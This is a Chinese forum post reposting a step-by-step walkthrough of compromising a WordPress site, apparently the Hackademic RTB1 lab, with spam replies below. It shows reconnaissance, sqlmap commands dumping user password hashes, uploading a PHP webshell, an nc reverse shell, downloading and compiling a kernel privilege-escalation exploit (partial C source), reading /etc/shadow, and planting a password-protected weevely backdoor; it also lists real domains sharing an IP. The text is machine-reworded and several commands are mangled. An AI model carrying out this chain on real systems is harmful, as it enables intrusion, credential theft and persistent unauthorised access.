外链论坛

 找回密码
 立即注册
搜索
查看: 60|回复: 5

黑客怎么样攻破一个网站?图文讲解全流程

[复制链接]

3054

主题

176

回帖

9909万

积分

论坛元老

Rank: 8Rank: 8

积分
99098893
发表于 2024-7-29 09:52:17 | 显示全部楼层 |阅读模式

上篇文案黑客怎样攻破一个网站?图文讲解全流程重点分享了网友对黑客攻击目的网站进行 seo 黑链处理的战争,本文将用图文讲解黑客攻破网站全流程

内容源于华盟网

PS:一篇科普文,很适合小白,长文请静下心看。

经过本文你将认识黑客常用的入手思路和技术手法,适合热爱网络信息安全的新手伴侣认识学习。本文将从最起始的信息收集起始讲述黑客是怎样一步步的攻破你的网站和服务器的。阅读本文你会学到以下内容:

渗透测试前的简单信息收集。

sqlmap的运用

nmap的运用

nc反弹提权

linux系统的权限提高

backtrack 5中渗透测试工具nikto和w3af的运用

假设黑客要入侵的你的网站域名为:hack-test.com

咱们用ping命令获取网站服务器的IP位置

此刻咱们获取了网站服务器的IP位置为:173.236.138.113

寻找同一服务器上的其它网站,咱们运用sameip.org.

26 sites hosted on IP Address 173.236.138.113

ID

Domain

Site Link

1

hijackthisforum.com

hijackthisforum.com

2

sportforum.net

sportforum.net

3

freeonlinesudoku.net

freeonlinesudoku.net

4

cosplayhell.com

cosplayhell.com

5

videogamenews.org

videogamenews.org

6

gametour.com

gametour.com

7

qualitypetsitting.net

qualitypetsitting.net

8

brendanichols.com

brendanichols.com

9

8ez.com

8ez.com

10

hack-test.com

hack-test.com

11

kisax.com

kisax.com

12

paisans.com

paisans.com

13

mghz.com

mghz.com

14

debateful.com

debateful.com

15

jazzygoodtimes.com

jazzygoodtimes.com

16

fruny.com

fruny.com

17

vbum.com

vbum.com

18

wuckie.com

wuckie.com

19

force5inc.com

force5inc.com

20

virushero.com

virushero.com

21

twincitiesbusinesspeernetwork.com

twincitiesbusinesspeernetwork.com

22

jennieko.com

jennieko.com

23

davereedy.com

davereedy.com

24

joygarrido.com

joygarrido.com

25

prismapp.com

prismapp.com

26

utiligolf.com

utiligolf.com

173.236.138.113上有26个网站,非常多黑客为了攻破你的网站可能会检测同服务器上的其它网站,然则这次是以科研目的咱们将抛开服务器上的其它网站,只针对你的网站来进行入侵检测。

咱们需要关于你网站的以下信息:

DNS records (A, NS, TXT, MX and SOA)

Web Server Type (Apache, IIS, Tomcat)

Registrar (the company that owns your domain)

Your name, address, email and phone

Scripts that your site uses (php, asp, asp.net, jsp, cfm)

Your server OS (Unix,Linux,Windows,Solaris)

Your server open ports to internet (80, 443, 21, etc.)

咱们起始找你网站的DNS记录,咱们用who.is来完成这一目的.

咱们发掘你的DNS记录如下

咱们来确定web服务器的类型

发掘你的Web服务器是apache,接下来确定它的版本.

IP: 173.236.138.113

Website Status: active

Server Type: Apache

Alexa Trend/Rank: 1 Month:3,213,968 3 Month: 2,161,753

Page Views per Visit: 1 Month: 2.0 3Month: 3.7

接下来是时候寻找你网站域名的注册信息,你的tel、邮箱、位置等.

咱们此刻已然获取了你的网站域名的注册信息,包含你的重要信息等.

咱们能够经过backtrack5中的whatweb来获取你的网站服务器操作系统类型和服务器的版本.

咱们发掘你的网站运用了著名的php整站程序wordpress,服务器的的系统类型为FedoraLinux,Web服务器版本Apache 2.2.15.继续查看网站服务器开放的端口,用渗透测试工具nmap:

1-Find services that run on server(查看服务器上运行的服务)

2-Find server OS(查看操作系统版本)

仅有80端口是开放的,操作系统是Linux2.6.22(Fedora Core 6),此刻咱们已然收集了所相关于你网站的重要信息,接下来起始扫描寻找漏洞,比如:

Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF等等.

咱们运用Nikto来收集漏洞信息:

root@bt:/pentest/web/nikto# perlnikto.pl -h hack-test.com

咱们会用到Backtrack 5 R1中的W3AF 工具:

root@bt:/pentest/web/w3af#./w3af_gui

咱们输入要检测的网站位置,选取完整的安全审计选项.

稍等一会,你将会看到扫描结果.

发掘你的网站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.让咱们来探讨SQL注入漏洞.

http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220

咱们经过工具发掘这个URL存在SQL注入,咱们经过Sqlmap来检测这个url.

Using sqlmap with –u url

过一会你会看到

输入N按回车键继续

咱们发掘你的网站存在mysql显错注入,mysql数据库版本是5.0. 咱们经过加入参数”-dbs”来尝试采集数据库名.

发掘三个数据库,接下来经过参数”-D wordpress -tables”来查看wordpress数据库的所有表名

经过参数“-T wp_users –columns ”来查看wp_users表中的字段.

接下来猜解字段user_login和user_pass的值.用参数”-C user_login,user_pass–dump”

咱们发掘用户名和秘码hashes值. 咱们需要经过以下在线破解网站来破解秘码hashes

http://www.onlinehashcrack.com/free-hash-reverse.php

登陆wordpress的后台wp-admin

尝试上传php webshell到服务器,以方便运行有些linux命令.在插件页面寻找任何能够编辑的插件.咱们选取Textile这款插件,编辑插进咱们的php webshell,点击更新文件,而后拜访咱们的phpwebshell.

Phpwebshell被解析了,咱们能够控制你网站的文件,然则咱们期盼得到网站服务器的root权限,来入侵服务器上其它的网站。

咱们用NC来反弹一个shell,首要咱们的电脑上监听5555端口.

而后在Php webshell上反向连接咱们的电脑,输入你的IP和端口5555.

点击连接咱们会看到

接下来咱们尝试执行有些命令:

id

uid=48(apache) gid=489(apache) groups=489(apache)

(用来表示用户的id和组)

pwd

/var/www/html/Hackademic_RTB1/wp-content/plugins

表示服务器上当前的路径)

uname -a

Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux

表示内核版本信息)

此刻咱们晓得,服务器的内核版本是2.6.31.5-127.fc12.1686,咱们在exploit-db.com中搜索此版本的关联漏洞.

在服务器上测试了非常多exp之后,咱们用以下的exp来提高权限.

http://www.exploit-db.com/exploits/15285

咱们在nc shell上执行以下命令:

wgethttp://www.exploit-db.com/exploits/15285 -o roro.c

(下载exp到服务器并重命名为roro.c)

注:非常多linux内核的exp都是C语言研发的,因此呢咱们保留为.c扩展名.

exp roro.c代码如下:

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define RECVPORT 5555

#define SENDPORT 6666

int prep_sock(int port)

{

int s, ret;

struct sockaddr_in addr;

s = socket(PF_RDS, SOCK_SEQPACKET, 0);

if(s < 0)

{

printf(“[*] Could not open socket.”);

exit(-1);

}

memset(&addr, 0, sizeof(addr));

经过以上代码咱们发掘该exp是C语言研发的,咱们需要将他编译成elf格式的,命令如下:

gcc roro.c –ororo

接下来执行编译好的exp

./roro

执行完成之后咱们输入id命令

id

咱们发掘咱们已然是root权限了

uid=0(root) gid=0(root)

此刻咱们能够查看/etc/shadow文件

cat/etc/shadow

咱们能够运用”john theripper”工具破解所有用户的秘码.然则咱们不会这般做,咱们需要在这个服务器上留下后门以方便咱们在任何时候拜访它.

咱们用weevely制作一个php小马上传到服务器上.

1.weevely运用选项

root@bt:/pentest/backdoors/web/weevely#./main.py -

2.用weevely创建一个秘码为koko的php后门

root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko

接下来上传到服务器之后来运用

root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko

测试咱们的hax.php后门

完成,撒花!

热门文案举荐

服务器被黑遭攻击,凌晨一点紧急逆袭

除了霍金,咱们或许该记住并缅怀更加多

互联网流量被BAT收割,区块链却要来收割巨头?

大众好,我便是区块链自己。今天,我要给你们介绍我的家族……

从零起始创建自己的区块链应用(JAVA版)

回复

使用道具 举报

2

主题

752

回帖

-7

积分

限制会员

积分
-7
发表于 2024-8-21 00:38:54 | 显示全部楼层
同意、说得对、没错、我也是这么想的等。
回复

使用道具 举报

0

主题

1万

回帖

1

积分

新手上路

Rank: 1

积分
1
发表于 2024-9-6 01:33:56 | 显示全部楼层
在遇到你之前,我对人世间是否有真正的圣人是怀疑的。
回复

使用道具 举报

3082

主题

2万

回帖

9996万

积分

论坛元老

Rank: 8Rank: 8

积分
99968829
发表于 2024-10-1 17:13:07 | 显示全部楼层
楼主果然英明!不得不赞美你一下!
回复

使用道具 举报

2986

主题

2万

回帖

9606万

积分

论坛元老

Rank: 8Rank: 8

积分
96066074
发表于 2024-10-11 06:07:57 | 显示全部楼层
感谢楼主分享,祝愿外链论坛越办越好!
回复

使用道具 举报

2930

主题

2万

回帖

9910万

积分

论坛元老

Rank: 8Rank: 8

积分
99109437
发表于 2024-10-27 19:20:33 | 显示全部楼层
楼主果然英明!不得不赞美你一下!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

站点统计|Archiver|手机版|小黑屋|外链论坛 ( 非经营性网站 )|网站地图

GMT+8, 2024-11-5 16:36 , Processed in 0.086324 second(s), 19 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.